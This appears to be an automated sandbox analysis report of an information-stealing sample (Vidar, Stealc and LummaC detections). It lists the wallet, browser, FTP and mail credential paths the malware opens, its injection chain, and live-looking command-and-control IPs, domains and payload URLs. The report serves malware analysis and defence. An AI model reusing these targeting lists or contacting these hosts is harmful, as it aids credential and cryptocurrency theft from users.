Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Yara detected Credential Stealer
Source: Yara match File source: 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1700, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.IIJKJDAFHJ.exe.3f55570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.IIJKJDAFHJ.exe.3f55570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2320759817.0000000003F55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2759155964.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.37e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.37e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1700, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F0C40 sqlite3_bind_zeroblob, 2_2_6C2F0C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2F0D60 sqlite3_bind_parameter_name, 2_2_6C2F0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C218EA0 sqlite3_clear_bindings, 2_2_6C218EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523816 Sample: file.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 107 treatynreit.site 2->107 109 steamcommunity.com 2->109 111 9 other IPs or domains 2->111 133 Multi AV Scanner detection for domain / URL 2->133 135 Suricata IDS alerts for network traffic 2->135 137 Found malware configuration 2->137 139 16 other signatures 2->139 12 file.exe 2 2->12         started        signatures3 process4 file5 89 C:\Users\user\AppData\Local\...\file.exe.log, CSV 12->89 dropped 159 Contains functionality to inject code into remote processes 12->159 161 Writes to foreign memory regions 12->161 163 Allocates memory in foreign processes 12->163 165 Injects a PE file into a foreign processes 12->165 16 RegAsm.exe 1 147 12->16         started        21 conhost.exe 12->21         started        signatures6 process7 dnsIp8 91 cowod.hopto.org 45.132.206.251, 49777, 80 LIFELINK-ASRU Russian Federation 16->91 93 49.12.197.9, 443, 49740, 49741 HETZNER-ASDE Germany 16->93 95 2 other IPs or domains 16->95 73 C:\Users\...\66fbfccd837ac_vadggdsa[1].exe, PE32 16->73 dropped 75 C:\Users\user\...\66fbfcc9963ca_ldfsna[1].exe, PE32 16->75 dropped 77 C:\Users\user\...\66fbfcc301a31_swws[1].exe, PE32 16->77 dropped 79 9 other files (7 malicious) 16->79 dropped 117 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->117 119 Found many strings related to Crypto-Wallets (likely being stolen) 16->119 121 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->121 123 3 other signatures 16->123 23 IIJKJDAFHJ.exe 16->23         started        26 GDBFCGIIIJ.exe 2 16->26         started        28 KJEGDBKFIJ.exe 2 16->28         started        30 cmd.exe 16->30         started        file9 signatures10 process11 signatures12 141 Multi AV Scanner detection for dropped file 23->141 143 Writes to foreign memory regions 23->143 145 Allocates memory in foreign processes 23->145 32 RegAsm.exe 23->32         started        37 conhost.exe 23->37         started        147 Injects a PE file into a foreign processes 26->147 149 LummaC encrypted strings found 26->149 39 RegAsm.exe 26->39         started        41 conhost.exe 26->41         started        43 RegAsm.exe 160 28->43         started        45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        49 timeout.exe 30->49         started        process13 dnsIp14 97 46.8.231.109, 49775, 49780, 49781 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 32->97 81 C:\Users\user\AppData\...\softokn3[1].dll, PE32 32->81 dropped 83 C:\Users\...\66fbfccd837ac_vadggdsa[1].exe, PE32 32->83 dropped 85 C:\Users\user\...\66fbfcc9963ca_ldfsna[1].exe, PE32 32->85 dropped 87 7 other files (5 malicious) 32->87 dropped 125 Tries to steal Mail credentials (via file / registry access) 32->125 127 Found many strings related to Crypto-Wallets (likely being stolen) 32->127 129 Tries to harvest and steal ftp login credentials 32->129 131 3 other signatures 32->131 51 cmd.exe 32->51         started        53 cmd.exe 32->53         started        99 gravvitywio.store 104.21.16.12, 443, 49779, 49798 CLOUDFLARENETUS United States 39->99 101 absorptioniw.site 104.21.17.174, 443, 49776, 49794 CLOUDFLARENETUS United States 39->101 105 6 other IPs or domains 39->105 103 23.67.133.187, 443, 49802 AKAMAI-ASN1EU United States 43->103 file15 signatures16 process17 process18 55 userBAAAAKJKJE.exe 51->55         started        58 conhost.exe 51->58         started        60 userAFIDGDBGCA.exe 53->60         started        62 conhost.exe 53->62         started        signatures19 151 Multi AV Scanner detection for dropped file 55->151 153 Writes to foreign memory regions 55->153 155 Allocates memory in foreign processes 55->155 64 RegAsm.exe 55->64         started        67 conhost.exe 55->67         started        157 Injects a PE file into a foreign processes 60->157 69 conhost.exe 60->69         started        71 RegAsm.exe 60->71         started        process20 signatures21 113 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 64->113 115 Tries to harvest and steal browser information (history, passwords, etc) 64->115
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.8.231.109
 unknown Russian Federation
28917 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics true
49.12.197.9
 unknown Germany
24940 HETZNER-ASDE true
23.67.133.187
 unknown United States
20940 AKAMAI-ASN1EU false
104.21.17.174
 absorptioniw.site United States
13335 CLOUDFLARENETUS true
104.21.21.3
 mysterisop.site United States
13335 CLOUDFLARENETUS true
147.45.44.104
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
45.132.206.251
 cowod.hopto.org Russian Federation
59731 LIFELINK-ASRU true
104.21.77.132
 questionsmw.store United States
13335 CLOUDFLARENETUS true
104.21.18.193
 snarlypagowo.site United States
13335 CLOUDFLARENETUS true
188.114.97.3
 soldiefieop.site European Union
13335 CLOUDFLARENETUS true
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
172.67.152.190
 abnomalrkmu.site United States
13335 CLOUDFLARENETUS true
104.21.16.12
 gravvitywio.store United States
13335 CLOUDFLARENETUS true
172.67.184.196
 treatynreit.site United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
treatynreit.site 172.67.184.196 true
snarlypagowo.site 104.21.18.193 true
steamcommunity.com 104.102.49.254 true
questionsmw.store 104.21.77.132 true
mysterisop.site 104.21.21.3 true
absorptioniw.site 104.21.17.174 true
abnomalrkmu.site 172.67.152.190 true
cowod.hopto.org 45.132.206.251 true
gravvitywio.store 104.21.16.12 true
soldiefieop.site 188.114.97.3 true
chorusarorp.site unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://49.12.197.9/ true
    		unknown
    https://abnomalrkmu.site/api true
      		unknown
      https://soldiefieop.site/api true
        		unknown
        https://49.12.197.9/sqlp.dll true
          		unknown
          https://49.12.197.9/softokn3.dll true
            		unknown
            http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll true
            • URL Reputation: malware
            		 unknown
            https://steamcommunity.com/profiles/76561199724331900 true
            • URL Reputation: malware
            		 unknown
            questionsmw.stor true
              		unknown
              https://49.12.197.9/vcruntime140.dll true
                		unknown
                https://49.12.197.9/nss3.dll true
                  		unknown
                  https://steamcommunity.com/profiles/76561199780418869 true
                    		unknown
                    http://46.8.231.109/ true
                    • URL Reputation: malware
                    		 unknown
                    http://46.8.231.109/1309cdeb8f4c8736/nss3.dll true
                    • URL Reputation: malware
                    		 unknown
                    https://gravvitywio.store/api true
                      		unknown
                      snarlypagowo.site true
                        		unknown
                        chorusarorp.site true
                          		unknown
                          https://49.12.197.9/msvcp140.dll true
                            		unknown
                            http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll true
                            • URL Reputation: malware
                            		 unknown
                            http://147.45.44.104/prog/66fbfcc301a31_swws.exe false
                              		unknown
                              https://questionsmw.store/api true
                                		unknown